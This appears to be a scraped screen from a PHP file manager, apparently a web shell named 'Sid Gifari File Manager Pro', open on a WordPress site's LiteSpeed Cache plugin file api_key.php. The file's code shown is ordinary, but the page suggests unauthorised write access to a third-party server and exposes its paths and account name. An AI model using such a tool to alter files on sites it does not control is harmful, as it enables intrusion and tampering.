🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-19 10:57:38 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
thedasstores.com
/
wp-content
/
plugins
/
litespeed-cache
/
tpl
/
inc
📍 /home/therahul/thedasstores.com/wp-content/plugins/litespeed-cache/tpl/inc
🔄 Refresh
✏️
Editing: api_key.php
Writable
<?php namespace LiteSpeed ; defined( 'WPINC' ) || exit ; $api_key = $this->conf( Base::O_API_KEY ) ; ?> <?php if ( ! $api_key ) : ?> <p class="litespeed-desc"> <?php echo __( 'This will also generate an API key from LiteSpeed\'s Server.', 'litespeed-cache' ) ; ?> </p> <?php endif ; ?>
💾 Save Changes
❌ Cancel